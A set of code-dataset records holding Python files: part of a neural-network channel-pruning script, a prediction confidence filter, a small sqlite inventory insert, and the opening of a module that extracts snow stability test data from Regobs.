kernel_size=layer.kernel_size,\n stride=layer.stride,\n padding=layer.padding,\n bias=(layer.bias is not None))\n temp_conv.weight.data.copy_(layer.weight.data)\n\n if layer.bias is not None:\n temp_conv.bias.data.copy_(layer.bias.data)\n module.conv2 = temp_conv\n\n if isinstance(module, Bottleneck):\n layer = module.conv3\n if block_count <= self.current_block_count and not isinstance(layer, MaskConv2d):\n temp_conv = MaskConv2d(\n in_channels=layer.in_channels,\n out_channels=layer.out_channels,\n kernel_size=layer.kernel_size,\n stride=layer.stride,\n padding=layer.padding,\n bias=(layer.bias is not None))\n temp_conv.weight.data.copy_(layer.weight.data)\n\n if layer.bias is not None:\n temp_conv.bias.data.copy_(layer.bias.data)\n module.conv3 = temp_conv\n elif self.settings.net_type in ['vgg', 'lenet']:\n for module in self.pruned_model.features.modules():\n if isinstance(module, (nn.Conv2d)):\n block_count += 1\n layer = module\n if block_count <= self.current_block_count and not isinstance(layer, MaskConv2d): \n temp_conv = MaskConv2d(\n in_channels=layer.in_channels,\n out_channels=layer.out_channels,\n kernel_size=layer.kernel_size,\n stride=layer.stride,\n padding=layer.padding,\n bias=(layer.bias is not None))\n temp_conv.weight.data.copy_(layer.weight.data)\n\n if layer.bias is not None:\n temp_conv.bias.data.copy_(layer.bias.data)\n module = temp_conv\n\n def channel_selection(self):\n \"\"\"\n conduct channel selection\n \"\"\"\n\n # get testing error\n self.segment_wise_trainer.val(0)\n time_start = time.time()\n\n restart_index = None\n # find restart segment index\n if self.current_pivot_index:\n if self.current_pivot_index in self.settings.pivot_set:\n restart_index = self.settings.pivot_set.index(self.current_pivot_index)\n else:\n restart_index = len(self.settings.pivot_set)\n\n for index in range(self.num_segments):\n if self.segment_wise_trainer.pruned_segments[index] is None:\n continue\n if restart_index is not None:\n if index < restart_index:\n continue\n elif index == restart_index:\n if self.is_channel_selection and self.current_block_count == self.current_pivot_index:\n self.is_channel_selection = False\n continue\n\n if index == self.num_segments - 1:\n self.current_pivot_index = self.segment_wise_trainer.final_block_count\n else:\n self.current_pivot_index = self.settings.pivot_set[index]\n\n # fine tune the network with additional loss and final loss\n if (not self.is_segment_wise_finetune and not self.is_channel_selection) or \\\n (self.is_segment_wise_finetune and self.epoch != self.settings.segment_wise_n_epochs - 1):\n self.segment_wise_fine_tune(index)\n else:\n self.is_segment_wise_finetune = False\n\n # load best model\n best_model_path = os.path.join(self.checkpoint.save_path, 'model_{:0>3d}_swft.pth'.format(index))\n check_point_params = torch.load(best_model_path)\n ori_model_state = check_point_params[\"ori_model\"]\n pruned_model_state = check_point_params[\"pruned_model\"]\n aux_fc_state = check_point_params[\"aux_fc\"]\n self.ori_model = self.checkpoint.load_state(self.ori_model, ori_model_state)\n self.pruned_model = self.checkpoint.load_state(self.pruned_model, pruned_model_state)\n self.segment_wise_trainer.update_model(self.ori_model, self.pruned_model, aux_fc_state)\n\n # replace the baseline model\n if index == 0:\n if self.settings.net_type in ['preresnet']:\n self.ori_model.conv = copy.deepcopy(self.pruned_model.conv)\n for ori_module, pruned_module in zip(self.ori_model.modules(), self.pruned_model.modules()):\n if 
isinstance(ori_module, PreBasicBlock):\n ori_module.bn1 = copy.deepcopy(pruned_module.bn1)\n ori_module.bn2 = copy.deepcopy(pruned_module.bn2)\n ori_module.conv1 = copy.deepcopy(pruned_module.conv1)\n ori_module.conv2 = copy.deepcopy(pruned_module.conv2)\n if ori_module.downsample is not None:\n ori_module.downsample = copy.deepcopy(pruned_module.downsample)\n self.ori_model.bn = copy.deepcopy(self.pruned_model.bn)\n self.ori_model.fc = copy.deepcopy(self.pruned_model.fc)\n elif self.settings.net_type in ['resnet']:\n self.ori_model.conv1 = copy.deepcopy(self.pruned_model.conv)\n self.ori_model.bn1 = copy.deepcopy(self.pruned_model.bn1)\n for ori_module, pruned_module in zip(self.ori_model.modules(), self.pruned_model.modules()):\n if isinstance(ori_module, BasicBlock):\n ori_module.conv1 = copy.deepcopy(pruned_module.conv1)\n ori_module.conv2 = copy.deepcopy(pruned_module.conv2)\n ori_module.bn1 = copy.deepcopy(pruned_module.bn1)\n ori_module.bn2 = copy.deepcopy(pruned_module.bn2)\n if ori_module.downsample is not None:\n ori_module.downsample = copy.deepcopy(pruned_module.downsample)\n if isinstance(ori_module, Bottleneck):\n ori_module.conv1 = copy.deepcopy(pruned_module.conv1)\n ori_module.conv2 = copy.deepcopy(pruned_module.conv2)\n ori_module.conv3 = copy.deepcopy(pruned_module.conv3)\n ori_module.bn1 = copy.deepcopy(pruned_module.bn1)\n ori_module.bn2 = copy.deepcopy(pruned_module.bn2)\n ori_module.bn3 = copy.deepcopy(pruned_module.bn3)\n if ori_module.downsample is not None:\n ori_module.downsample = copy.deepcopy(pruned_module.downsample)\n self.ori_model.fc = copy.deepcopy(self.pruned_model.fc)\n elif self.settings.net_type in ['vgg', 'lenet']:\n for ori_module, pruned_module in zip (self.ori_model.modules(), self.pruned_model.modules()):\n if isinstance(ori_module, (nn.Conv2d)):\n ori_module = copy.deepcopy(pruned_module)\n self.ori_model.classifier = copy.deepcopy(self.pruned_model.classifier)\n\n aux_fc_state = []\n for i in range(len(self.segment_wise_trainer.aux_fc)):\n if isinstance(self.segment_wise_trainer.aux_fc[i], nn.DataParallel):\n temp_state = self.segment_wise_trainer.aux_fc[i].module.state_dict()\n else:\n temp_state = self.segment_wise_trainer.aux_fc[i].state_dict()\n aux_fc_state.append(temp_state)\n self.segment_wise_trainer.update_model(self.ori_model, self.pruned_model, aux_fc_state)\n self.segment_wise_trainer.val(0)\n\n # conduct channel selection\n # contains [0:index] segments\n net_origin_list = []\n net_pruned_list = []\n for j in range(index + 1):\n net_origin_list += utils.model2list(self.segment_wise_trainer.ori_segments[j])\n net_pruned_list += utils.model2list(self.segment_wise_trainer.pruned_segments[j])\n\n net_origin = nn.Sequential(*net_origin_list)\n net_pruned = nn.Sequential(*net_pruned_list)\n\n self._seg_channel_selection(\n net_origin=net_origin,\n net_pruned=net_pruned,\n aux_fc=self.segment_wise_trainer.aux_fc[index],\n pivot_index=self.current_pivot_index,\n index=index)\n\n # update optimizer\n aux_fc_state = []\n for i in range(len(self.segment_wise_trainer.aux_fc)):\n if isinstance(self.segment_wise_trainer.aux_fc[i], nn.DataParallel):\n temp_state = self.segment_wise_trainer.aux_fc[i].module.state_dict()\n else:\n temp_state = self.segment_wise_trainer.aux_fc[i].state_dict()\n aux_fc_state.append(temp_state)\n\n self.segment_wise_trainer.update_model(self.ori_model, self.pruned_model, aux_fc_state)\n\n self.checkpoint.save_checkpoint(self.ori_model, self.pruned_model,\n self.segment_wise_trainer.aux_fc,\n 
self.segment_wise_trainer.fc_optimizer,\n self.segment_wise_trainer.seg_optimizer,\n self.current_pivot_index,\n channel_selection=True,\n index=index,\n block_count=self.current_pivot_index)\n\n self.logger.info(self.ori_model)\n self.logger.info(self.pruned_model)\n self.segment_wise_trainer.val(0)\n self.current_pivot_index = None\n\n self.checkpoint.save_model(self.ori_model, self.pruned_model,\n self.segment_wise_trainer.aux_fc,\n self.segment_wise_trainer.final_block_count,\n index=self.num_segments)\n\n\n torch.save(self.pruned_model, \"cp_{}_{}_{}_{}.p\".format(self.settings.net_type, self.settings.depth, self.settings.dataset, self.settings.pruning_rate))\n\n time_interval = time.time() - time_start\n log_str = \"cost time: {}\".format(str(datetime.timedelta(seconds=time_interval)))\n\n if self.is_mnist:\n flops, params = profile(self.pruned_model, input_size=(1,1,32,32))\n else:\n lops, params = profile(self.pruned_model, input_size=(1, 3, 32, 32))\n self.v_logger.log_scalar(\"flops_count\", flops,self.v_logger.id)\n self.v_logger.log_scalar(\"params_count\", params, self.v_logger.id)\n self.logger.info(log_str)\n\n def _hook_origin_feature(self, module, input, output):\n gpu_id = str(output.get_device())\n self.feature_cache_origin[gpu_id] = output\n\n def _hook_pruned_feature(self, module, input, output):\n gpu_id = str(output.get_device())\n self.feature_cache_pruned[gpu_id] = output\n\n @staticmethod\n def _concat_gpu_data(data):\n data_cat = data[\"0\"]\n for i in range(1, len(data)):\n data_cat = torch.cat((data_cat, data[str(i)].cuda(0)))\n return data_cat\n\n def _layer_channel_selection(self, net_origin, net_pruned,\n aux_fc, module, block_count, layer_name=\"conv2\"):\n \"\"\"\n conduct channel selection for module\n :param net_origin: original network segments\n :param net_pruned: pruned network segments\n :param aux_fc: auxiliary fully-connected layer\n :param module: the module need to be pruned\n :param block_count: current block no.\n :param layer_name: the name of layer need to be pruned\n \"\"\"\n\n self.logger.info(\"|===>layer-wise channel selection: block-{}-{}\".format(block_count, layer_name))\n\n # layer-wise channel selection\n if self.settings.net_type in ['resnet', 'preresnet']:\n if layer_name == \"conv2\":\n layer = module.conv2\n elif layer_name == \"conv3\":\n layer = module.conv3\n else:\n assert False, \"unsupport layer: {}\".format(layer_name)\n\n if not isinstance(layer, MaskConv2d):\n temp_conv = MaskConv2d(\n in_channels=layer.in_channels,\n out_channels=layer.out_channels,\n kernel_size=layer.kernel_size,\n stride=layer.stride,\n padding=layer.padding,\n bias=(layer.bias is not None))\n temp_conv.weight.data.copy_(layer.weight.data)\n\n if layer.bias is not None:\n temp_conv.bias.data.copy_(layer.bias.data)\n temp_conv.pruned_weight.data.fill_(0)\n temp_conv.d.fill_(0)\n\n if layer_name == \"conv2\":\n module.conv2 = temp_conv\n elif layer_name == \"conv3\":\n module.conv3 = temp_conv\n layer = temp_conv\n\n # define criterion\n\n\n # register hook\n if layer_name == \"conv2\":\n hook_origin = net_origin[block_count].conv2.register_forward_hook(self._hook_origin_feature)\n hook_pruned = module.conv2.register_forward_hook(self._hook_pruned_feature)\n elif layer_name == \"conv3\":\n hook_origin = net_origin[block_count].conv3.register_forward_hook(self._hook_origin_feature)\n hook_pruned = module.conv3.register_forward_hook(self._hook_pruned_feature)\n elif self.settings.net_type in ['vgg', 'lenet']:\n if not isinstance(module, MaskConv2d):\n 
temp_conv = MaskConv2d(\n in_channels=module.in_channels,\n out_channels=module.out_channels,\n kernel_size=module.kernel_size,\n stride=module.stride,\n padding=module.padding,\n bias=(module.bias is not None))\n temp_conv.weight.data.copy_(module.weight.data)\n\n if module.bias is not None:\n temp_conv.bias.data.copy_(module.bias.data)\n temp_conv.pruned_weight.data.fill_(0)\n temp_conv.d.fill_(0)\n module = temp_conv\n hook_origin = net_origin[block_count].register_forward_hook(self._hook_origin_feature)\n hook_pruned = module.register_forward_hook(self._hook_pruned_feature)\n net_pruned[block_count] = module\n layer = module\n criterion_mse = nn.MSELoss().cuda()\n criterion_softmax = nn.CrossEntropyLoss().cuda()\n net_origin_parallel = utils.data_parallel(net_origin, self.settings.n_gpus)\n net_pruned_parallel = utils.data_parallel(net_pruned, self.settings.n_gpus)\n\n # avoid computing the gradient\n for params in net_origin_parallel.parameters():\n params.requires_grad = False\n for params in net_pruned_parallel.parameters():\n params.requires_grad = False\n\n net_origin_parallel.eval()\n net_pruned_parallel.eval()\n\n layer.pruned_weight.requires_grad = True\n aux_fc.cuda()\n logger_counter = 0\n record_time = utils.AverageMeter()\n\n for channel in range(layer.in_channels):\n if layer.d.eq(0).sum() <= math.floor(layer.in_channels * self.settings.pruning_rate):\n break\n\n time_start = time.time()\n cum_grad = None\n record_selection_mse_loss = utils.AverageMeter()\n record_selection_softmax_loss = utils.AverageMeter()\n record_selection_loss = utils.AverageMeter()\n img_count = 0\n for i, (images, labels) in enumerate(self.train_loader):\n images = images.cuda()\n labels = labels.cuda()\n net_origin_parallel(images)\n output = net_pruned_parallel(images)\n softmax_loss = criterion_softmax(aux_fc(output), labels)\n\n origin_feature = self._concat_gpu_data(self.feature_cache_origin)\n self.feature_cache_origin = {}\n pruned_feature = self._concat_gpu_data(self.feature_cache_pruned)\n self.feature_cache_pruned = {}\n mse_loss = criterion_mse(pruned_feature, origin_feature)\n\n loss = mse_loss * self.settings.mse_weight + softmax_loss * self.settings.softmax_weight\n loss.backward()\n record_selection_loss.update(loss.item(), images.size(0))\n record_selection_mse_loss.update(mse_loss.item(), images.size(0))\n record_selection_softmax_loss.update(softmax_loss.item(), images.size(0))\n\n if cum_grad is None:\n cum_grad = layer.pruned_weight.grad.data.clone()\n else:\n cum_grad.add_(layer.pruned_weight.grad.data)\n layer.pruned_weight.grad = None\n\n img_count += images.size(0)\n if self.settings.max_samples != -1 and img_count >= self.settings.max_samples:\n break\n\n self.v_logger.log_scalar(\"F-block-{}_{}_LossAll\".format(block_count, layer_name),\n record_selection_loss.avg,\n logger_counter)\n\n self.v_logger.log_scalar(\"F-block-{}_{}_MSELoss\".format(block_count, layer_name),\n record_selection_mse_loss.avg,\n logger_counter)\n\n self.v_logger.log_scalar(\"F-block-{}_{}_SoftmaxLoss\".format(block_count, layer_name),\n record_selection_softmax_loss.avg,\n logger_counter)\n\n cum_grad.abs_()\n # calculate gradient F norm\n grad_fnorm = cum_grad.mul(cum_grad).sum((2, 3)).sqrt().sum(0)\n\n # find grad_fnorm with maximum absolute gradient\n while True:\n _, max_index = torch.topk(grad_fnorm, 1)\n if layer.d[max_index[0]] == 0:\n layer.d[max_index[0]] = 1\n layer.pruned_weight.data[:, max_index[0], :, :] = layer.weight[:, max_index[0], :, :].data.clone()\n break\n else:\n 
grad_fnorm[max_index[0]] = -1\n\n # fine-tune average meter\n record_finetune_softmax_loss = utils.AverageMeter()\n record_finetune_mse_loss = utils.AverageMeter()\n record_finetune_loss = utils.AverageMeter()\n\n record_finetune_top1_error = utils.AverageMeter()\n record_finetune_top5_error = utils.AverageMeter()\n\n # define optimizer\n params_list = []\n params_list.append({\"params\": layer.pruned_weight, \"lr\": self.settings.layer_wise_lr})\n if layer.bias is not None:\n layer.bias.requires_grad = True\n params_list.append({\"params\": layer.bias, \"lr\": 0.001})\n optimizer = torch.optim.SGD(params=params_list,\n weight_decay=self.settings.weight_decay,\n momentum=self.settings.momentum,\n nesterov=True)\n img_count = 0\n for epoch in range(1):\n for i, (images, labels) in enumerate(self.train_loader):\n images = images.cuda()\n labels = labels.cuda()\n features = net_pruned_parallel(images)\n net_origin_parallel(images)\n output = aux_fc(features)\n softmax_loss = criterion_softmax(output, labels)\n\n origin_feature = self._concat_gpu_data(self.feature_cache_origin)\n self.feature_cache_origin = {}\n pruned_feature = self._concat_gpu_data(self.feature_cache_pruned)\n self.feature_cache_pruned = {}\n mse_loss = criterion_mse(pruned_feature, origin_feature)\n\n top1_error, _, top5_error = utils.compute_singlecrop(\n outputs=output, labels=labels,\n loss=softmax_loss, top5_flag=True, mean_flag=True)\n\n # update parameters\n optimizer.zero_grad()\n loss = mse_loss * self.settings.mse_weight + softmax_loss * self.settings.softmax_weight\n loss.backward()\n torch.nn.utils.clip_grad_norm_(layer.parameters(), max_norm=10.0)\n layer.pruned_weight.grad.data.mul_(\n layer.d.unsqueeze(0).unsqueeze(2).unsqueeze(3).expand_as(layer.pruned_weight))\n optimizer.step()\n # update record info\n record_finetune_softmax_loss.update(softmax_loss.item(), images.size(0))\n record_finetune_mse_loss.update(mse_loss.item(), images.size(0))\n record_finetune_loss.update(loss.item(), images.size(0))\n record_finetune_top1_error.update(top1_error, images.size(0))\n record_finetune_top5_error.update(top5_error, images.size(0))\n\n img_count += images.size(0)\n if self.settings.max_samples != -1 and img_count >= self.settings.max_samples:\n break\n\n layer.pruned_weight.grad = None\n if layer.bias is not None:\n layer.bias.requires_grad = False\n\n self.v_logger.log_scalar(\"F-block-{}_{}_SoftmaxLoss\".format(block_count, layer_name),\n record_finetune_softmax_loss.avg,\n logger_counter)\n\n self.v_logger.log_scalar(\"F-block-{}_{}_Loss\".format(block_count, layer_name),\n record_finetune_mse_loss.avg,\n logger_counter)\n\n self.v_logger.log_scalar(\"F-block-{}_{}_MSELoss\".format(block_count, layer_name),\n record_finetune_loss.avg,\n logger_counter)\n\n self.v_logger.log_scalar(\"F-block-{}_{}_Top1Error\".format(block_count, layer_name),\n record_finetune_top1_error.avg,\n logger_counter)\n\n self.v_logger.log_scalar(\"F-block-{}_{}_Top5Error\".format(block_count, layer_name),\n record_finetune_top5_error.avg,\n logger_counter)\n\n # write log information to file\n self._write_log(\n dir_name=os.path.join(self.settings.save_path, \"log\"),\n file_name=\"log_block-{:0>2d}_{}.txt\".format(block_count, layer_name),\n log_str=\"{:d}\\t{:f}\\t{:f}\\t{:f}\\t{:f}\\t{:f}\\t{:f}\\t{:f}\\t{:f}\\t\\n\".format(\n int(layer.d.sum()),\n record_selection_loss.avg,\n record_selection_mse_loss.avg,\n record_selection_softmax_loss.avg,\n record_finetune_loss.avg,\n record_finetune_mse_loss.avg,\n 
record_finetune_softmax_loss.avg,\n record_finetune_top1_error.avg,\n record_finetune_top5_error.avg))\n log_str = \"Block-{:0>2d}-{}\\t#channels: [{:0>4d}|{:0>4d}]\\t\".format(\n block_count, layer_name,\n int(layer.d.sum()), layer.d.size(0))\n log_str += \"[selection]loss: {:4f}\\tmseloss: {:4f}\\tsoftmaxloss: {:4f}\\t\".format(\n record_selection_loss.avg,\n record_selection_mse_loss.avg,\n record_selection_softmax_loss.avg)\n log_str += \"[fine-tuning]loss: {:4f}\\tmseloss: {:4f}\\tsoftmaxloss: {:4f}\\t\".format(\n record_finetune_loss.avg,\n record_finetune_mse_loss.avg,\n record_finetune_softmax_loss.avg)\n log_str += \"top1error: {:4f}\\ttop5error: {:4f}\".format(\n record_finetune_top1_error.avg,\n record_finetune_top5_error.avg)\n self.logger.info(log_str)\n\n logger_counter += 1\n time_interval = time.time() - time_start\n record_time.update(time_interval)\n\n for params in net_origin_parallel.parameters():\n params.requires_grad = True\n for params in net_pruned_parallel.parameters():\n params.requires_grad = True\n\n # remove hook\n hook_origin.remove()\n hook_pruned.remove()\n log_str = \"|===>Select channel from block-{:d}_{}: time_total:{} time_avg: {}\".format(\n block_count, layer_name,\n str(datetime.timedelta(seconds=record_time.sum)),\n str(datetime.timedelta(seconds=record_time.avg)))\n self.logger.info(log_str)\n log_str = \"|===>fine-tuning result: loss: {:f}, mse_loss: {:f}, softmax_loss: {:f}, top1error: {:f} top5error: {:f}\".format(\n record_finetune_loss.avg,\n record_finetune_mse_loss.avg,\n record_finetune_softmax_loss.avg,\n record_finetune_top1_error.avg,\n record_finetune_top5_error.avg)\n self.logger.info(log_str)\n\n self.logger.info(\"|===>remove hook\")\n\n @staticmethod\n def _write_log(dir_name, file_name, log_str):\n \"\"\"\n Write log to file\n :param dir_name: the path of directory\n :param file_name: the name of the saved file\n :param log_str: the string that need to be saved\n \"\"\"\n\n if not os.path.isdir(dir_name):\n os.mkdir(dir_name)\n with open(os.path.join(dir_name, file_name), \"a+\") as f:\n f.write(log_str)\n\n def _seg_channel_selection(self, net_origin, net_pruned, aux_fc, pivot_index, index):\n \"\"\"\n conduct segment channel selection\n :param net_origin: original network segments\n :param net_pruned: pruned network segments\n :param aux_fc: auxiliary fully-connected layer\n :param pivot_index: the layer index of the additional loss\n :param index: the index of segment\n :return:\n \"\"\"\n block_count = 0\n if self.settings.net_type in [\"preresnet\", \"resnet\"]:\n for module in net_pruned.modules():\n if isinstance(module, (PreBasicBlock, BasicBlock)):\n block_count += 1\n # We will not prune the pruned blocks again\n if not isinstance(module.conv2, MaskConv2d):\n self._layer_channel_selection(\n net_origin=net_origin, net_pruned=net_pruned,\n aux_fc=aux_fc, module=module, block_count=block_count,\n layer_name=\"conv2\")\n self.logger.info(\"|===>checking layer type: {}\".format(type(module.conv2)))\n\n self.checkpoint.save_model(self.ori_model, self.pruned_model,\n self.segment_wise_trainer.aux_fc,\n pivot_index, channel_selection=True,\n index=index, block_count=block_count)\n self.checkpoint.save_checkpoint(self.ori_model, self.pruned_model,\n self.segment_wise_trainer.aux_fc,\n self.segment_wise_trainer.fc_optimizer,\n self.segment_wise_trainer.seg_optimizer,\n pivot_index,\n channel_selection=True,\n index=index, block_count=block_count)\n\n elif isinstance(module, Bottleneck):\n block_count += 1\n if not 
isinstance(module.conv2, MaskConv2d):\n self._layer_channel_selection(\n net_origin=net_origin, net_pruned=net_pruned,\n aux_fc=aux_fc, module=module, block_count=block_count,\n layer_name=\"conv2\")\n\n if not isinstance(module.conv3, MaskConv2d):\n self._layer_channel_selection(\n net_origin=net_origin, net_pruned=net_pruned,\n aux_fc=aux_fc, module=module, block_count=block_count,\n layer_name=\"conv3\")\n\n self.checkpoint.save_model(self.ori_model, self.pruned_model,\n self.segment_wise_trainer.aux_fc,\n pivot_index, channel_selection=True,\n index=index, block_count=block_count)\n self.checkpoint.save_checkpoint(self.ori_model, self.pruned_model,\n self.segment_wise_trainer.aux_fc,\n self.segment_wise_trainer.fc_optimizer,\n self.segment_wise_trainer.seg_optimizer,\n pivot_index,\n channel_selection=True,\n index=index, block_count=block_count)\n elif self.settings.net_type in ['vgg', 'lenet']:\n ms = iter(net_pruned.modules())\n next(ms)\n for module in ms:\n\n if isinstance(module, (nn.Conv2d)):\n #block_count += 1\n # We will not prune the pruned blocks again\n self._layer_channel_selection(\n net_origin=net_origin, net_pruned=net_pruned,\n aux_fc=aux_fc, module=module, block_count=block_count)\n self.logger.info(\"|===>checking layer type: {}\".format(type(module)))\n\n self.checkpoint.save_model(self.ori_model, self.pruned_model,\n self.segment_wise_trainer.aux_fc,\n pivot_index, channel_selection=True,\n index=index, block_count=block_count)\n self.checkpoint.save_checkpoint(self.ori_model, self.pruned_model,\n self.segment_wise_trainer.aux_fc,\n self.segment_wise_trainer.fc_optimizer,\n self.segment_wise_trainer.seg_optimizer,\n pivot_index,\n channel_selection=True,\n index=index, block_count=block_count)\n block_count += 1\n\n\ndef main():\n #parser = argparse.ArgumentParser(description=\"Discrimination-aware channel pruning\")\n #parser.add_argument('conf_path', type=str, metavar='conf_path',\n # help='configuration path')\n #args = parser.parse_args()\n\n option = Option(\"mnist_lenet5_03.hocon\")\n #option = Option(\"mnist_resnet18_03.hocon\")\n vis = VisdomLogger(port=10999)\n l = LoggerForSacred(vis,0)\n experiment = Experiment(option, logger=l)\n experiment.channel_selection()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"dcp/channel_pruning.py","file_name":"channel_pruning.py","file_ext":"py","file_size_in_byte":51450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"488770745","text":"import pandas as pd\nimport os\nimport sys\nimport argparse\nimport time\nimport datetime\nfrom classify_images import write_dataframe_to_CSV\n\ndef process_input_arguments():\n parser = argparse.ArgumentParser('Export predictions below a certain uncertainty.')\n parser.add_argument('-p', '--predictions', help='Filename or file path for predictions CSV')\t\n parser.add_argument('-c', '--certainty', help='Threshold for certainty')\n parser.add_argument('-s', '--setting', default='l', help ='l for low confidence filter, h for high confidence filter')\n args = parser.parse_args()\n filename = args.predictions\n threshold = float(args.certainty)\n setting = args.setting\n\n return filename, threshold, setting\n\nif __name__ == '__main__':\n # Start execution and parse arguments\n start_time = time.time()\n filename, threshold, setting = process_input_arguments()\n\n # Read in predictions and sort by confidence level\n predictions = pd.read_csv(filename)\n col1 = predictions.columns[1]\n col2 = predictions.columns[2]\n 
predictions = predictions.sort_values(by=[col2])\n\n # Select those tuples where BOTH predictions are below a certain threshold\n # e.g. threshold = 0.6, and predictions[1] = 0.55 and predictions[2] = 0.45\n results = []\n filename_option = ''\n if setting == 'l':\n results = predictions[(predictions[col1] < threshold) & (predictions[col2] < threshold)]\n filename_option = 'low_confidence'\n elif setting == 'h':\n results = predictions[(predictions[col1] < (1 - threshold)) | (predictions[col2] < (1 - threshold))]\n filename_option = 'high_confidence'\n else:\n print('ERROR: Invalid setting selected. (Hint: choose l for low or h for high confidence filtering.)')\n sys.exit(0)\n\n # Save to file\n filepath = write_dataframe_to_CSV('predictions', filename_option, results)\n print('Predictions saved to %s .' % filepath)\n\n # Finish execution\n end_time = time.time()\n print('Completed in %.1f seconds' % (end_time - start_time))","sub_path":"utilities/archive/list_images_confidence_threshold.py","file_name":"list_images_confidence_threshold.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"396230398","text":"import sqlite3\n\nwith sqlite3.connect(\"cars.db\") as connection:\n\tc = connection.cursor()\n\n\tcars = [\n\t(\"Ford\", \"Mondeo\", 10),\n\t(\"Ford\", \"Fiesta\", 2000),\n\t(\"Ford\", \"Edge\", 65),\n\t(\"Honda\", \"Civic\", 222),\n\t(\"Honda\", \"Jazz\", 50)\n\t]\n\n\tc.executemany(\"INSERT INTO inventory VALUES(?, ?, ?)\", cars)\n","sub_path":"cars_02_sql.py","file_name":"cars_02_sql.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"192804714","text":"# -*- coding: utf-8 -*-\n\"\"\"Module for extracting results from tests and profiles in Regobs.\"\"\"\n\nimport setenvironment as env\nfrom varsomdata import getvarsompickles as gvp\nfrom varsomdata import getobservations as go\nimport collections as cols\nimport logging as lg\n\n__author__ = 'ragnarekker'\n\n\ndef _str(s):\n \"\"\"Wash the strings.\"\"\"\n\n if s is None:\n s = ''\n\n if s == 'Ikke gitt':\n s = ''\n\n if s == 'Ikke spesifisert':\n s = ''\n\n return str(s)\n\n\nclass TestsAndLayerInfo:\n\n def __init__(self, t, p):\n\n self.result = t.PropagationName\n self.test = None\n self.pnx = None\n self.depth = t.FractureDepth\n self.taps = t.TapsFracture\n self.fracture = t.ComprTestFractureName\n self.url = f\"{env.registration_basestring}{t.RegID}\"\n self.obstime = str(t.DtObsTime)\n self.forecast_region_name = t.ForecastRegionName\n self.forecast_region_tid = t.ForecastRegionTID\n\n self.layer_thickness = None\n self.layer_grain_form = None\n self.layer_grain_size = None\n self.layer_hardness = None\n self.layer_hardness_id = None\n\n self.above_layer_thickness = None\n self.above_layer_grain_form = None\n self.above_layer_grain_size = None\n self.above_layer_hardness = None\n self.above_layer_hardness_id = None\n\n self.below_layer_thickness = None\n self.below_layer_grain_form = None\n self.below_layer_grain_size = None\n self.below_layer_hardness = None\n self.below_layer_hardness_id = None\n\n self._set_test()\n self._set_pnx()\n\n if self.depth: # Only given if there is a fracture somewhere\n if p:\n self._set_layer_info(p)\n\n self.original_test = t\n self.original_profile = p\n\n def _set_test(self):\n if 'ECT' in self.result:\n self.test = 'ECT'\n elif 'CT' in self.result:\n self.test = 'CT'\n\n def _set_pnx(self):\n\n if 
self.result == 'ECTX' or self.result == 'CTN':\n self.pnx = 'X'\n elif 'ECTP' in self.result:\n self.pnx = 'P'\n elif 'ECTN' in self.result:\n self.pnx = 'N'\n\n def _set_layer_info(self, p):\n\n l_index = 0\n layer_selected = False\n if p.StratProfile:\n\n for l in p.StratProfile:\n if layer_selected is False:\n # if test result in a boundary,\n # and it is not at the top by faulty observation,\n # find which layer is the loosest (lower TID for looser layer)\n # and choose this for the layer we are studying\n # else, go back one layer and choose this\n if l.DepthTop == self.depth:\n if l_index > 0:\n if l.HardnessTID <= p.StratProfile[l_index-1].HardnessTID:\n layer_selected = True\n else:\n l_index -= 1\n l = p.StratProfile[l_index]\n layer_selected = True\n\n # else if test is in a layer, all is clear\n elif l.DepthTop < self.depth < (l.DepthTop + l.Thickness):\n layer_selected = True\n\n if layer_selected:\n self.layer_thickness = l.Thickness\n self.layer_grain_form = l.GrainFormPrimaryName\n self.layer_grain_size = l.GrainSizeAvg\n self.layer_hardness = l.HardnessName\n self.layer_hardness_id = l.HardnessTID\n\n if l_index > 0:\n self.above_layer_thickness = p.StratProfile[l_index-1].Thickness\n self.above_layer_grain_form = p.StratProfile[l_index-1].GrainFormPrimaryName\n self.above_layer_grain_size = p.StratProfile[l_index-1].GrainSizeAvg\n self.above_layer_hardness = p.StratProfile[l_index-1].HardnessName\n self.above_layer_hardness_id = p.StratProfile[l_index-1].HardnessTID\n\n if len(p.StratProfile) > l_index + 1:\n self.below_layer_thickness = p.StratProfile[l_index+1].Thickness\n self.below_layer_grain_form = p.StratProfile[l_index+1].GrainFormPrimaryName\n self.below_layer_grain_size = p.StratProfile[l_index+1].GrainSizeAvg\n self.below_layer_hardness = p.StratProfile[l_index+1].HardnessName\n self.below_layer_hardness_id = p.StratProfile[l_index+1].HardnessTID\n\n l_index += 1\n\n def to_ord_dict(self):\n\n _ord_dict = cols.OrderedDict([\n ('Result', self.result),\n ('Test', self.test),\n ('PNX', self.pnx),\n ('Depth', self.depth),\n ('Taps', self.taps),\n ('Fracture', self.fracture),\n ('Layer thick', self.layer_thickness),\n ('Layer grain', self.layer_grain_form),\n ('Layer grain Ø', self.layer_grain_size),\n ('Layer hardness', self.layer_hardness),\n ('Above thick', self.above_layer_thickness),\n ('Above grain', self.above_layer_grain_form),\n ('Above grain Ø', self.above_layer_grain_size),\n ('Above hardness', self.above_layer_hardness),\n ('Below thick', self.below_layer_thickness),\n ('Below grain', self.below_layer_grain_form),\n ('Below grain Ø', self.below_layer_grain_size),\n ('Below hardness', self.below_layer_hardness),\n ('Region', self.forecast_region_name),\n ('Region ID', self.forecast_region_tid),\n ('Obs time', self.obstime),\n ('URL', self.url)\n ])\n\n return _ord_dict\n\n\ndef get_tests_and_layer_info_to_gustav():\n \"\"\"Gustav Pless wrote 28th Oct 2019:\n\n Hei\n\n Jeg jobber med en liten studie der jeg sammenligner et sett stabilitetstester og\n registrerer forskjeller. Jeg utfører et sett tester sammen med en snøprofil og\n kan se på hvilke tester som er effektive på hvilken type svakt lag, dybde, hardhet\n etc. Ulempen min er at jeg ikke får et godt statistisk utvalg, men det finnes jo i\n regobs. I hvert fall på ECT og CT. Vedlagt er det relativt begrensede\n datagrunnlaget jeg har enn så lenge.\n\n Er det mulig å få dratt ut data fra alle ECT og CT tester fra regobs? 
